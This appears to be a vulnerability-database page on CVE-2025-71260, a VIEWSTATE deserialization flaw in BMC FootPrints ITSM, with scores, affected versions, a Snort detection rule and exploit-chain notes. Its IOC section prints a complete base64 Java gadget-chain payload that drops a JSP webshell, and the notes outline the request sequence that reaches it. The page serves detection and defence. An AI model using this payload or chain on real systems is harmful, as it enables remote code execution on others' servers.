cbcvebase.
CVE-2025-71260
published 2026-03-19

CVE-2025-71260: BMC FootPrints ITSM versions 20.20.02 through 20.24.01.001 contain a deserialization of untrusted data vulnerability in the ASP.NET servlet's VIEWSTATE…

PriorityP183high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
34.36%
98.2th percentile
BMC FootPrints ITSM versions 20.20.02 through 20.24.01.001 contain a deserialization of untrusted data vulnerability in the ASP.NET servlet's VIEWSTATE handling that allows authenticated attackers to execute arbitrary code. Attackers can supply crafted serialized objects to the VIEWSTATE parameter to achieve remote code execution and fully compromise the application. The following hotfixes remediate the vulnerability: 20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002, and 20.24.01.

Affected

2 ranges
VendorProductVersion rangeFixed in
bmcfootprints_itsm20.20.02 – 20.24.01.001
bmc_software_incfootprints20.20.02 – 20.24.01.001

Detection & IOCsextracted from sources · hover to see the quote

url/footprints/servicedesk/aspnetconfig
path/footprints/servicedesk/aspnetconfig
cookieSEC_TOKEN=
hashrO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAGndlYmFwcHMvUk9PVC93YXRjaFRvd3IuanNwc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHEAfgADeHB1cgACW0Ks8xf4BghU4AIAAHhwAAABvjwlQCBwYWdlIGxhbmd1YWdlPSJqYXZhIiBjb250ZW50VHlwZT0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04IiBwYWdlRW5jb2Rpbmc9IlVURi04IiU+CjwlCiAgICBTdHJpbmcgb3NVc2VyID0gU3lzdGVtLmdldFByb3BlcnR5KCJ1c2VyLm5hbWUiKTsKICAgIFN0cmluZyBjd2QgPSBTeXN0ZW0uZ2V0UHJvcGVydHkoInVzZXIuZGlyIik7CiU+CjwhRE9DVFlQRSBodG1sPgo8aHRtbD4KPGhlYWQ+CiAgICA8dGl0bGU+d2F0Y2hUb3dyIFN5c3RlbSBJbmZvPC90aXRsZT4KPC9oZWFkPgo8Ym9keT4KICAgIDxoMT5TeXN0ZW0gSW5mb3JtYXRpb248L2gxPgogICAgPHA+PHN0cm9uZz5PUyBVc2VyOjwvc3Ryb25nPiA8JT0gb3NVc2VyICU+PC9wPgogICAgPHA+PHN0cm9uZz5DdXJyZW50IFdvcmtpbmcgRGlyZWN0b3J5Ojwvc3Ryb25nPiA8JT0gY3dkICU+PC9wPgo8L2JvZHk+CjwvaHRtbD4Kc3IAPm9yZy5hc3BlY3RqLndlYXZlci50b29scy5jYWNoZS5TaW1wbGVDYWNoZSRTdG9yZWFibGVDYWNoaW5nTWFwO6sCH0tqVloCAANKAApsYXN0U3RvcmVkSQAMc3RvcmluZ1RpbWVyTAAGZm9sZGVydAASTGphdmEvbGFuZy9TdHJpbmc7eHIAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAAHcIAAAAEAAAAAB4AAABmQ2q4P0AAAAMdAABLnh4
bytes
rO0
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS BMC FootPrints aspnetconfig __VIEWSTATE Parameter Unsafe Deserialization Remote Code Execution Attempt (CVE-2025-71260)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:36; content:"/footprints/servicedesk/aspnetconfig"; fast_pattern; http.cookie; content:"SEC_TOKEN|3d|"; startswith; http.request_body; content:"Content-Disposition|3a 20|form-data|3b 20|name|3d 22 5d 5d|VIEWSTATE|22|"; content:"rO0"; within:20; reference:url,labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/; reference:cve,2025-71260; reference:cve,2025-21760; classtype:attempted-admin; sid:2068320; rev:1; metadata:affected_product BMC_FootPrints, attack_target Server, tls_state TLSDecrypt, created_at 2026_03_18, cve CVE_2025_21760, deployment Perimeter, deployment Internal, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2026_03_18, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Exploit chain entry point: unauthenticated GET to /footprints/servicedesk/passwordreset/request/ returns a SEC_TOKEN session cookie, which is then used to authenticate the deserialization request to /footprints/servicedesk/aspnetconfig.
  • The deserialization payload is delivered via the __VIEWSTATE parameter in a POST to /footprints/servicedesk/aspnetconfig. The serialized Java object begins with the magic bytes 'rO0' (base64-encoded Java serialization header 0xACED0000).
  • Successful exploitation drops a JSP webshell under webapps/ROOT/ (e.g., watchTowr.jsp or a random 9-character alphanumeric filename). Monitor for new .jsp files appearing in the webapps/ROOT directory and HTTP 200 responses to GET /<random>.jsp containing 'System Information', 'OS User:', and 'Current Working Directory:'.
  • The Snort/ET rule (sid:2068320) fires on POST requests to /footprints/servicedesk/aspnetconfig with a SEC_TOKEN cookie and a multipart body containing a VIEWSTATE field whose value starts with 'rO0'. Deploy this rule on perimeter and internal sensors with TLS decryption enabled.
  • ·The exploit is described as 'pre-authentication RCE' when chained with CVE-2025-71257 (auth bypass via /footprints/servicedesk/passwordreset/request/) and CVE-2025-71259/CVE-2025-71258 (SSRF). CVE-2025-71260 alone requires an authenticated session (SEC_TOKEN cookie), but the auth bypass makes the full chain unauthenticated.
  • ·The Nuclei template payload targets the webapps/ROOT/ path for JSP drop, implying a Tomcat-based deployment. The dropped webshell filename is randomized (9 alphanumeric chars) per execution to evade static filename detection; defenders should use content-based detection rather than filename matching.
  • ·The ET Snort rule metadata specifies tls_state TLSDecrypt, meaning the rule only fires when TLS inspection/decryption is active. Without SSL decryption, the rule will not trigger on HTTPS traffic.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv4.08.7HIGHCVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.